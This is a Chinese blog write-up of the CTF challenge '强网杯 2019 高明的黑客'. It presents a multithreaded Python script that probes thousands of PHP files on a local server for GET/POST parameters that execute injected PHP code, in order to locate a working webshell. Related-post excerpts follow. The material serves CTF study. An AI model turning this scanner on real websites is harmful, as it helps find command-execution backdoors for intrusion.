2021-8-18 [强网杯 2019]高明的黑客 知识点:python-threading 脚本编写

最新推荐文章于 2024-04-16 00:21:28 发布
最新推荐文章于 2024-04-16 00:21:28 发布
阅读量173 收藏
点赞数 1
分类专栏: webctf 文章标签: python 多线程 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119784574
版权

看了大佬博客,手动打一遍(相当于复制粘贴了),-_-||
大佬博客:
强网杯 2019-高明的黑客
强网杯 2019-高明的黑客(考察代码编写能力)
short-code
温馨提示:
当在本地测试的时候,php版本需要大于等于7.0
记录结果最好保存到一个文本文件中,因为直接在控制台很难找到!!!!

import os
import re
import requests
import threading
import time
print("开始时间:"+time.asctime(time.localtime(time.time())))
s1=threading.Semaphore(100) #设置最大线程数
filepath=r"C:/Users/Lenovo/Desktop/src/" #当前资源路径
os.chdir(filepath) #改变当前资源路径
files=os.listdir(filepath)
requests.adapters.DEFAULT_RETRIES=5 #设置重连次数,防止线程数过高,断开连接
session=requests.Session()
session.keep_alive=False
def get_content(file):
    s1.acquire()
    print("trying "+file+"in "+time.asctime(time.localtime(time.time())))
    with open(file,encoding='utf-8') as f:
        gets=list(re.findall('\$_GET\[\'(.*?)\'\]',f.read()))
        posts=list(re.findall('\$_POST\[\'(.*?)\'\]',f.read()))
    data={} #所有的POST
    param={} #所有的GET
    for m in gets:
        param[m]="echo '123456';"
    for n in posts:
        data[n]="echo '123456';"
    url="http://127.0.0.1/src/"+file
    req=session.post(url,data=data,params=param)
    req.close()
    req.encoding='utf-8'
    content=req.text
    if "123456" in content:
        flag=0
        for a in gets:
            req=session.get(url+"?%s="%a+"echo '123456';")
            content=req.text
            req.close()
            if "123456" in content:
                flag=1
                break
        if flag!=1:
            for b in posts:
                req=session.post(url,data={b:"echo '123456';"})
                content=req.text
                req.close()
                if "123456" in content:
                    break
        if flag==1:
            param=a
        else:
            param=b
        print("找到了利用文件:"+file+" 和利用参数:%s"%param)
        local_file = open("flag.txt", "w", encoding="utf-8")
        local_file.write(file+param)
        print("结束时间: "+time.asctime(time.localtime(time.time())))
    s1.release()

for i in files: #加入多线程
    t=threading.Thread(target=get_content,args=(i,))
    t.start()

写的简陋了点,因为懒。在这里插入图片描述

Sakura-501
关注
专栏目录
buuctf web [强网杯 2019]高明黑客
m0_46412682的博客
07-20 681
buuctf web [强网杯 2019]高明黑客 开始的页面 既然页面上有提示,我们就输入www.tar.gz 有文件压缩包,我们下载下来,压缩打开后,有几千个文件 这里我们随便打开一个文件,这里有很多shell,但是很多是用不了的,所以要用python来测试,不可能手动 import requests import os import re import threading import time session = requests.Session() session.keep_
[强网杯 2019]高明黑客 1
shinygod的博客
03-06 852
知识点脚本编写能力 下载文件,并解压文件。 windows可以直接winrar解压,Linux:tar -xzvf file.tar.gz //解压tar.gz 有几千个文件随便访问 有一堆没用的参数,所以这题一个要从几千个文件找那个可以实现一句话木马的地方。 怎么用脚本实现呢?一头雾水,这边用别的师傅的脚本 import os import requests import re import threading import time print('start: '+ time.ascti
CTF-BUUCTF-Web-[强网杯 2019]高明黑客
qq_42404383的博客
01-01 772
CTF-BUUCTF-Web-[强网杯 2019]高明黑客 如题: 解题: 没看到其他任何提示,直接down下源码 我的娘哦!这要看到何时去? 盲猜大概要自己写脚本,然后分析代码 [致敬大佬,借用脚本]: https://blog.csdn.net/xiayu729100940/article/details/102676405 import os import requests impor...
【BUUCTF】[强网杯 2019]高明黑客
aoao331198的博客
04-26 2405
拿到的源码有3000多个文件,所有文件都是杂乱的 网上wp感觉对题目的理解部分讲解较少,结合蚁剑工具,我觉得题目意思像是说这里面的文件是一句话木马,我们要找到合适的GET或POST参数能执行shell命令。 用脚本暴力跑完所有文件的所有参数,技术不行,只能贴别人的代码 import os import requests import re import threading import time print('开始时间: '+ time.asctime( time.localtime(time.ti.
BUUCTF[强网杯 2019]高明黑客
qq_44749590的博客
06-08 561
高明黑客BUUCTF
tw-utils:Teeworlds python脚本
03-08
"tw-utils: Teeworlds Python 脚本"是一个针对Teeworlds游戏的工具集合,主要由Python编程语言编写。Teeworlds是一款免费且开源的第一人称射击游戏,以其卡通风格的画面和快节奏的游戏体验而受到玩家的喜爱。而tw-...
Python-Code:学习Python过程中编写的练习代码
04-08
13. **脚本自动化**:利用Python编写日常任务脚本,如文件管理、系统监控等。 14. **网络编程**:了解socket编程,实现简单的客户端和服务端通信。 15. **并发编程**:使用线程(threading模块)和进程...
Python-旅行青蛙刷三叶草脚本
08-10
这涉及到以下几个Python编程知识点: 1. **Python GUI自动化库**:脚本可能使用了如Selenium或PyAutoGUI这样的库来模拟用户界面交互。Selenium用于网页自动化,而PyAutoGUI则适用于桌面应用。这些库允许脚本控制...
Python-按歌手分类自动下载无损音乐的Python脚本
08-10
Python开发中,这类脚本可能涉及到以下知识点: 1. **网络请求库**:如`requests`或`urllib`,用于向音乐下载网站发送HTTP请求,获取音乐链接。 2. **网页解析**:可能需要使用HTML解析库,如`BeautifulSoup`或`...
Python3编写实用脚本程序-远程服务器下载文件.zip
05-23
综上所述,Python3编写实用脚本下载远程服务器文件是一个涉及网络编程、文件操作、错误处理等多个技术点的综合性任务,通过学习和实践这些知识点,我们可以构建出强大而灵活的工具来满足各种需求。
[强网杯 2019]高明黑客
pakho_C的博客
04-16 1149
web第42题 [强网杯 2019]高明黑客 打开靶场 根据提示下载备份文件 里面有几千个php文件 审计一下发现,很多类似于这种,有命令执行的可能,但是很多将参数置空了,无法利用,只能自己寻找可以利用的php文件,手动寻找不现实 ,只能编写脚本 学习大佬的脚本: 出处:[强网杯 2019]高明黑客(考察代码编写能力) import os import requests import re import threading import time print('开始时间: '+ time.asc
[强网杯 2019]高明黑客(每日一题)
qq_51684648的博客
09-07 1095
[强网杯 2019]高明黑客(每日一题) 1,打开网页,发现提示,下载文件 2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)] 3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
[强网杯 2019]高明黑客(考察代码编写能力)
a3320315的博客
11-07 9840
0x01 试题分析 1、我们先打开题目,提示可以下载源码 下载源码,打开是几千个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,所以我们猜测这几千个php文件中肯定含有可以使用的shell,我们只有写脚本去试了。 0x02 脚本分析 – coding: utf-8 – import os import requests import re import...
学习笔记 强网杯-随便注
Sacrifice_li的博客
06-11 243
set @b=concat("sel","ect flagfrom `1919810931114514` "); PREPARE:准备一条SQL语句,并分配给这条SQL语句一个名字供之后调用 prepage hello from @b; EXECUTE :执行命令 execute hello; 即可在过滤了select的时候执行select命令 ...
[BT]BUUCTF刷题第17天(4.15)
最新发布
Bluetuan的博客
04-16 918
tar.gz是 Linux 系统下的压缩包,访问即可下载打开后有3000多个php文件,通过题解得知需要写Python脚本找出合适的GetShell文件(因为每个文件里都会通过system函数执行命令,但不是每个函数都带有参数)因为拿到了所有PHP文件,所以我们可以在本地搭建环境运行脚本(我的本地环境搭建域名是localtest接下来就是使用脚本(来自大佬题解)原理是遍历目录下所有文件,然后定义了一个函数逐个打开文件,再正则表达式匹配获取所有的GET 参数和POST 参数,再访问url。
强网杯2019高明黑客&强网先锋上单)
kid的博客
05-30 5649
强网杯2019高明黑客&强网先锋上单)   前言 这里主要是对强网杯web高明黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
BUUCTF—WEB-高明黑客
迷风小白
06-25 6829
高明黑客 下载www.tar.gz 发现是很多混乱的shell,不过某些地方还是有迹可循的,可以通过$_GET或者$_POST传参回显 可以写个脚本批量扫描一下文件里的$_GET和$_POST,然后统一赋值echo "got it",如果回显结果中包含got it,那么证明该文件为可用shell python脚本如下: import os import requests from mult...
2019强网杯部分writeup
Sea_Sand息禅
06-04 5619
Web 1、UPLOAD 复现环境https://github.com/CTFTraining/qwb_2019_upload 先看一下网站情况: 是一个注册可登录的界面,登陆之后可以上传图片,一个账号只能上传一次。 扫一下后台目录,发现upload是泄露的,www.tar.gz是泄露的。 www.tar.gz下载下来是网站的源码,upload则是我们上传的文件,找到上传文件的源码: &lt...
Python多线程技术与实战-守护线程与threading模块
`Selenium`是一个强大的浏览器自动化框架,它允许开发者使用多种编程语言(如Python)编写脚本来控制浏览器,进行网页元素的操作、页面交互以及自动化测试。`Selenium2Python自动化测试实战`这本书的序言中提到,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值